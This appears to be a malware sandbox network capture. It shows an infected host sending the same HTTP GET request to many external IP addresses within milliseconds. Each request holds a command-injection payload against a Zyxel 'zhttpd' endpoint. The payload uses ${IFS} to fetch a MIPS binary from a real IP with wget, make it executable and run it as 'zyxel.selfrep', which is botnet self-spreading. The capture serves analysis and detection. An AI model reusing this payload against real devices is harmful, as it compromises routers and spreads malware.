                                            Jan 14, 2024 15:50:51.648150921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7526192.168.2.234767870.195.141.178443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.648183107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7527192.168.2.234056413.238.107.134443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.648212910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7528192.168.2.2349388101.15.209.113443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.648243904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7529192.168.2.23474284.178.171.150443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.648252964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7530192.168.2.233323043.138.200.150443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.648277044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7531192.168.2.2354020115.65.17.206443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.648300886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7532192.168.2.2345992181.73.222.225443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.648339033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7533192.168.2.2334348146.28.32.28443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.648350954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7534192.168.2.234763231.200.187.49443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.648386955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7535192.168.2.2339816165.26.72.116443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.648392916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7536192.168.2.233924492.229.106.110443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.648423910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7537192.168.2.233304235.250.129.185443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.648453951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7538192.168.2.236018037.21.223.149443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.648490906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7539192.168.2.235612085.197.1.21443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.648519039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7540192.168.2.2346704159.169.135.185443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.648555994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7541192.168.2.235987224.229.124.92443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.648557901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7542192.168.2.2358632199.4.155.71443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.648576975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7543192.168.2.233815231.117.150.197443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.648593903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7544192.168.2.2339528116.183.6.10443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.648659945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7545192.168.2.2343544133.115.113.43443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.648673058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7546192.168.2.234458448.15.13.60443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.648693085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7547192.168.2.2344740190.121.207.182443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.648720980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7548192.168.2.235676842.4.241.27443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.648751020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7549192.168.2.2348230130.225.111.96443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.648783922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7550192.168.2.234780095.40.133.161443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.648799896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7551192.168.2.2354268197.211.179.198443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.648825884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7552192.168.2.2336316184.95.167.193443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.648838997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7553192.168.2.2336524105.99.102.216443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.648860931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7554192.168.2.2349600200.113.122.133443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.648894072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7555192.168.2.2343600213.38.65.64443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.648914099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7556192.168.2.235656071.187.96.165443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.648937941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7557192.168.2.2354274218.184.122.221443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.648991108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7558192.168.2.235057851.28.102.54443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.649000883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7559192.168.2.2354448166.86.46.26443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.649033070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7560192.168.2.2335880200.8.166.199443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.649046898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7561192.168.2.234957835.175.57.215443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.649064064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7562192.168.2.234129895.119.82.56443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.649096012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7563192.168.2.2336936109.207.82.13443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.649127960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7564192.168.2.233670438.79.5.155443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.649198055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7565192.168.2.235460053.164.119.248443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.649220943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7566192.168.2.2332812217.36.17.244443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.649220943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7567192.168.2.2334396192.241.132.142443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.649235964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7568192.168.2.235444488.61.203.101443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.649275064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7569192.168.2.2352588208.96.39.247443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.649286032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7570192.168.2.23414504.56.2.198443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.649295092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7571192.168.2.234270835.26.180.127443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.649331093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7572192.168.2.233345088.238.234.173443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.649374962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7573192.168.2.236031246.180.42.20443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.649377108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7574192.168.2.2343680138.42.229.36443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.649411917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7575192.168.2.2351972173.194.1.44443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.649426937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7576192.168.2.2352780111.51.159.172443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.649487019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7577192.168.2.235515894.100.86.14443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.649487019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7578192.168.2.2339658222.59.128.217443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.649516106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7579192.168.2.235023624.71.153.3443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.649538040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7580192.168.2.2358794178.28.37.88443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.649605989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7581192.168.2.2352574101.132.92.15443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.649610043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7582192.168.2.2350086124.189.144.1443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.649650097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7583192.168.2.234698471.43.170.218443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.649672985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7584192.168.2.2350708116.17.252.254443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.649707079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7585192.168.2.233591671.109.64.221443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.649730921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7586192.168.2.234734631.68.21.255443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.649748087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7587192.168.2.233796685.232.4.175443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.649775982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7588192.168.2.2346418133.56.252.118443
                                            TimestampBytes transferredDirectionData
